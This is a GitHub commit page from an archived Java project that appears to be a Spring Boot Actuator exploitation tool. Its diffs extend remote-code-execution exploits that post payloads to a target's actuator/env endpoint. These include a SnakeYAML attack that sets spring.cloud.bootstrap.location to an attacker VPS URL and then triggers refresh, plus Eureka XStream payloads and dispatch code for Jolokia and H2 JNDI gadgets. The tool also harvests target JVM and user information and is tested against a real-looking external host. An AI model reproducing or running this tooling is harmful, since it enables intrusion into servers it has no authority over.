Skip to content
This repository was archived by the owner on Jul 25, 2024. It is now read-only.

Commit 536502f

Browse files
SummerSecSummerSec
committed
EXP
1 parent 1d269e0 commit 536502f

7 files changed

Lines changed: 112 additions & 46 deletions

File tree

src/main/java/com/drops/exp/EurekaXstreamRCEEXP.java

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -24,7 +24,7 @@ public class EurekaXstreamRCEEXP {
2424
*
2525
* @return:
2626
*/
27-
public static boolean setRCEV1(String target, String vps, String port){
27+
public boolean setRCEV1(String target, String vps, String port){
2828
String boby = bobyV1 + vps + port + "/example";
2929
System.out.println(boby);
3030
if (EnvPost.isPostEnv(target)){
@@ -41,7 +41,7 @@ public static boolean setRCEV1(String target, String vps, String port){
4141
return false;
4242
}
4343

44-
public static boolean setRCEV2(String target, String vps, String port){
44+
public boolean setRCEV2(String target, String vps, String port){
4545
String boby = bobyV2 + vps + port + "/example\"}";
4646
System.out.println(boby);
4747
if (EnvPost.isPostEnvV2(target)){

src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -27,8 +27,8 @@ public SnakeYAMLRCEEXP() {
2727
}
2828

2929
public boolean sendExp(String target, String vps, String EchoType, boolean version){
30-
String echo = EchoType;
3130
String boby = "spring.cloud.bootstrap.location=http://" + vps + ":3456/" + EchoType + ".yml";
31+
String boby2 = "{\"name\":\"spring.cloud.bootstrap.location\",\"value\":\"http://" + vps + ":3456/" + EchoType + ".yml\"}";
3232
if (version){
3333
String url = URLUtil.getROOT(target);
3434
if (EnvPost.isPostEnv(url)){
@@ -49,7 +49,7 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi
4949
String url = URLUtil.getROOT(target);
5050
if (EnvPost.isPostEnvV2(url)){
5151
if (RefreshPost.isRefreshPostV2(url)) {
52-
HttpResponse re = HTTPUtils.postRequestV2(url, "actuator/env", boby);
52+
HttpResponse re = HTTPUtils.postRequestV2(url, "actuator/env", boby2);
5353
if (re.isOk()) {
5454
HttpResponse res = HTTPUtils.postRequestV2(url,"refresh");
5555
if (res.isOk()){

src/main/java/com/drops/main/AttackService.java

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,11 @@
11
package com.drops.main;
22

33
import com.drops.entity.ControllersFactory;
4+
import com.drops.exp.EurekaXstreamRCEEXP;
5+
import com.drops.exp.JolokiaLogbackRCEEXP;
6+
import com.drops.exp.JolokiaRealmRCEEXP;
47
import com.drops.exp.SnakeYAMLRCEEXP;
8+
import com.drops.poc.EurekaXstreamRCEPOC;
59
import com.drops.poc.SnakeYAMLRCEPOC;
610
import com.drops.poc.SpringBootInfo;
711
import com.drops.poc.SpringBootInfoCheck;
@@ -49,9 +53,36 @@ public boolean gadgetSend(String target, String vps, String gadget, String echo)
4953
SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
5054
return exp.sendExp(target,vps,echo,flag);
5155
}else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
56+
EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
57+
// return exp.
58+
}else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
59+
JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
60+
61+
}else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
62+
JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
63+
64+
}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
65+
5266

5367
}
5468

69+
}else {
70+
if (gadget.equalsIgnoreCase("SnakeYAMLRCE")) {
71+
SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
72+
return exp.sendExp(target,vps,echo,flag);
73+
}else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
74+
EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
75+
// return exp.
76+
}else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
77+
JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
78+
79+
}else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
80+
JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
81+
82+
}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
83+
84+
85+
}
5586
}
5687
}catch (Exception e){
5788
this.mainController.logTextArea.appendText(Utils.log(e.getMessage()));

src/main/java/com/drops/poc/H2DatabaseConsoleJNDIRCEPOC.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@
1818
public class H2DatabaseConsoleJNDIRCEPOC {
1919

2020
private final MainController mainController;
21-
SpringBootInfoCheck info = new SpringBootInfoCheck();
21+
2222

2323
public H2DatabaseConsoleJNDIRCEPOC() {
2424
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());

src/main/java/com/drops/poc/SpringBootInfo.java

Lines changed: 18 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -25,26 +25,26 @@ public class SpringBootInfo {
2525
List<String> pointListV2 = new ArrayList<>();
2626
static boolean SpringbootVersionV1 = false;
2727
String[] basicPoint = new String[]{"cloudfoundryapplication","hystrix.stream" };
28-
PropertiesBean properties;
28+
2929
MainController mainController;
30-
SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
30+
SpringBootInfoCheck infoCheck ;
3131
public List<String> gadget = new ArrayList<>();
3232
List<String> gadgetExp = new ArrayList<>();
3333

34-
public SpringBootInfo(List<String> pointListV1, List<String> pointListV2, String[] basicPoint, PropertiesBean properties, MainController mainController) {
35-
this.pointListV1 = pointListV1;
36-
this.pointListV2 = pointListV2;
37-
this.basicPoint = basicPoint;
38-
this.properties = properties;
39-
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
40-
}
34+
// public SpringBootInfo(List<String> pointListV1, List<String> pointListV2, String[] basicPoint, PropertiesBean properties, MainController mainController) {
35+
// this.pointListV1 = pointListV1;
36+
// this.pointListV2 = pointListV2;
37+
// this.basicPoint = basicPoint;
38+
// this.properties = properties;
39+
// this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
40+
// }
4141

4242
// public SpringBootInfo() {
4343
// }
4444

4545
public SpringBootInfo(){
4646
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
47-
47+
this.infoCheck = new SpringBootInfoCheck();
4848

4949
pointListV1.add("autoconfig");
5050
pointListV1.add("heapdump");
@@ -116,22 +116,22 @@ public SpringBootInfo(){
116116
public boolean doCheck(String target) throws MalformedURLException {
117117
String rootaddr = URLUtil.normalizeURL(target);
118118
try {
119-
if (infoCheck.CheckPointInfo(rootaddr)){
119+
if (this.infoCheck.CheckPointInfo(rootaddr)){
120120
this.mainController.logTextArea.appendText(Utils.log("检测到 Spring Boot 404 特征!"));
121121
}
122-
if (infoCheck.check404(rootaddr)){
122+
if (this.infoCheck.check404(rootaddr)){
123123
this.mainController.logTextArea.appendText(Utils.log("默认404页面返回200,无法准确爆破!"));
124124
}
125125
}catch (Exception e){
126126
this.mainController.logTextArea.appendText(Utils.log(e.getMessage()));
127127
}
128128
try {
129-
infoCheck.checkActuatorPointV1(rootaddr);
130-
infoCheck.checkEnvPointV1(rootaddr);
129+
this.infoCheck.checkActuatorPointV1(rootaddr);
130+
this.infoCheck.checkEnvPointV1(rootaddr);
131131

132132
if (!SpringbootVersionV1){
133-
infoCheck.checkActuatorPointV2(rootaddr);
134-
infoCheck.checkEnvPointV2(rootaddr);
133+
this.infoCheck.checkActuatorPointV2(rootaddr);
134+
this.infoCheck.checkEnvPointV2(rootaddr);
135135
}
136136
this.mainController.logTextArea.appendText(Utils.log("检测流程结束! "));
137137
}catch (Exception e){
@@ -146,6 +146,8 @@ public boolean doCheck(String target) throws MalformedURLException {
146146

147147
void parseProperties(PropertiesBean properties){
148148
if (properties.getHaveInfo()){
149+
// this.mainController.logTextArea.appendText();
150+
// infoCheck.
149151
this.mainController.logTextArea.appendText(Utils.log("\tJVM信息:\t\t"+properties.getJvmName()));
150152
this.mainController.logTextArea.appendText(Utils.log("\t端口信息:\t\t"+properties.getServerPort()));
151153
this.mainController.logTextArea.appendText(Utils.log("\tJava版本:\t\t"+properties.getJavaVersion()));

src/main/java/com/drops/poc/SpringBootInfoCheck.java

Lines changed: 24 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@
1010
import com.drops.utils.*;
1111

1212
import java.util.Map;
13+
import java.util.Properties;
1314
import java.util.Scanner;
1415
import java.util.UUID;
1516

@@ -78,7 +79,7 @@ public boolean check404(String target){
7879
// Spring Boot 1.x版本端点在根URL下注册。
7980
public boolean checkActuatorPointV1(String target){
8081
for (String point : info.pointListV1){
81-
if (SpringbootUtils.checkPoint(target, point)){
82+
if (this.SpringbootUtils.checkPoint(target, point)){
8283
this.setSpringbootVersionV1(true);
8384
}
8485
}
@@ -87,7 +88,7 @@ public boolean checkActuatorPointV1(String target){
8788
// Spring Boot 2.x版本端点移动到/actuator/路径
8889
public boolean checkActuatorPointV2(String target){
8990
for (String point : info.pointListV2){
90-
if (SpringbootUtils.checkPoint(target, point)){
91+
if (this.SpringbootUtils.checkPoint(target, point)){
9192
this.setSpringbootVersionV1(false);
9293
}
9394
}
@@ -96,8 +97,11 @@ public boolean checkActuatorPointV2(String target){
9697

9798
// Spring Boot env端点存在环境属性覆盖和XStream反序列化漏洞
9899
void checkEnvPointV1(String addr){
99-
String url = URLUtil.normalizeURL(addr) + "env";
100-
SnakeYAMLRCEPOC yamlrcepoc = new SnakeYAMLRCEPOC();
100+
String url = URLUtil.normalizeURL(addr) + "env";
101+
HttpResponse response = HTTPUtils.getRequest(url);
102+
PropertiesBean properties = this.EnvParser(this.scannerOutput(new Scanner(ResponseUtil.getBoby(response))));
103+
this.parseProperties(properties);
104+
SnakeYAMLRCEPOC yamlrcepoc = new SnakeYAMLRCEPOC();
101105
if (!yamlrcepoc.hasSnakeYAMLRCE(url)){
102106
EurekaXstreamRCEPOC xstreamRCEPOC = new EurekaXstreamRCEPOC();
103107
if (!xstreamRCEPOC.hasEurekaXstreamRCE(url)){
@@ -117,8 +121,10 @@ void checkEnvPointV1(String addr){
117121

118122
// Spring Boot 2.x版本存在H2配置不当导致的RCE,目前非正则判断,测试阶段
119123
void checkEnvPointV2(String addr){
120-
final String url = addr+"actuator/env";
121-
// HttpResponse response = HTTPUtils.getRequest(url);
124+
final String url = addr+"actuator/env";
125+
HttpResponse response = HTTPUtils.getRequest(url);
126+
PropertiesBean properties = this.EnvParser(this.scannerOutput(new Scanner(ResponseUtil.getBoby(response))));
127+
this.parseProperties(properties);
122128
SnakeYAMLRCEPOC yamlrcepoc = new SnakeYAMLRCEPOC();
123129
if (!yamlrcepoc.hasSnakeYAMLRCE(url)){
124130
EurekaXstreamRCEPOC xstreamRCEPOC = new EurekaXstreamRCEPOC();
@@ -140,7 +146,7 @@ void checkEnvPointV2(String addr){
140146

141147
}
142148

143-
public PropertiesBean EnvParser(String result){
149+
public PropertiesBean EnvParser(String result){
144150
PropertiesBean propertiesBean = new PropertiesBean();
145151
try {
146152
JSONObject jsonObject = JSON.parseObject(result);
@@ -187,6 +193,17 @@ public String scannerOutput(Scanner scanner){
187193
}
188194

189195

196+
void parseProperties(PropertiesBean properties){
197+
if (properties.getHaveInfo()){
198+
// this.mainController.logTextArea.appendText();
199+
// infoCheck.
200+
this.mainController.logTextArea.appendText(Utils.log("\tJVM信息:\t\t"+properties.getJvmName()));
201+
this.mainController.logTextArea.appendText(Utils.log("\t端口信息:\t\t"+properties.getServerPort()));
202+
this.mainController.logTextArea.appendText(Utils.log("\tJava版本:\t\t"+properties.getJavaVersion()));
203+
this.mainController.logTextArea.appendText(Utils.log("\t用户名:\t\t"+properties.getUserName()));
204+
}
205+
}
206+
190207

191208

192209

src/main/java/com/drops/utils/URLUtil.java

Lines changed: 34 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -47,17 +47,24 @@ public static String encodeURL(String target){
4747
}
4848

4949
public static String getROOT(String target) {
50-
String result = null;
51-
URL url = null;
52-
try {
53-
url = new URL(URLUtil.normalizeURL(target));
54-
} catch (MalformedURLException e) {
55-
e.printStackTrace();
50+
String[] result = target.split("/");
51+
String res = "";
52+
int i = 0;
53+
for (String p:result){
54+
if (p.equals("")){
55+
p = "//";
56+
i += 1;
57+
}
58+
// System.out.println(p);
59+
res += p;
60+
i += 1;
61+
// System.out.println(res + " " + i);
62+
// System.out.println(i);
63+
if (i == 4){
64+
return res + "/";
65+
}
5666
}
57-
result = url.getHost() + ":" + url.getPort() + "/";
58-
59-
System.out.println("getROOT result -> " + result);
60-
return result;
67+
return res + "/";
6168
}
6269

6370
public static String getHost(String target){
@@ -75,25 +82,34 @@ public static String getHost(String target){
7582
}
7683

7784
public static int getPort(String target){
78-
int result ;
85+
// int result ;
7986
URL url = null;
8087
try {
8188
url = new URL(URLUtil.normalizeURL(target));
8289
} catch (MalformedURLException e) {
8390
e.printStackTrace();
8491
}
85-
result = url.getPort();
86-
return result;
92+
String protocol = url.getProtocol();
93+
// System.out.println(protocol);
94+
if (protocol.equals("https")){
95+
return 443;
96+
}else if(protocol.equals("http")){
97+
return 80;
98+
}
99+
100+
return url.getPort();
87101
}
88102

89103

90104
public static void main(String[] args) {
91-
String url = "127.0.0.1:922/encsa";
105+
String url = "http://smartms.zihome.com/actuator/env";
92106
String point = "sad";
93-
System.out.println(URLUtil.normalizeURL(url)+point);
94-
System.out.println(URLUtil.getHost(URLUtil.normalizeURL(url)));
95-
System.out.println(URLUtil.getPort(url));
96-
System.out.println(URLUtil.getPath(url));
107+
108+
// System.out.println(URLUtil.normalizeURL(url)+point);
109+
// System.out.println(URLUtil.getHost(URLUtil.normalizeURL(url)));
110+
System.out.println(URLUtil.getROOT(url));
111+
// System.out.println(URLUtil.getPort(url));
112+
// System.out.println(URLUtil.getPath(url));
97113
}
98114

99115

0 commit comments

Comments
 (0)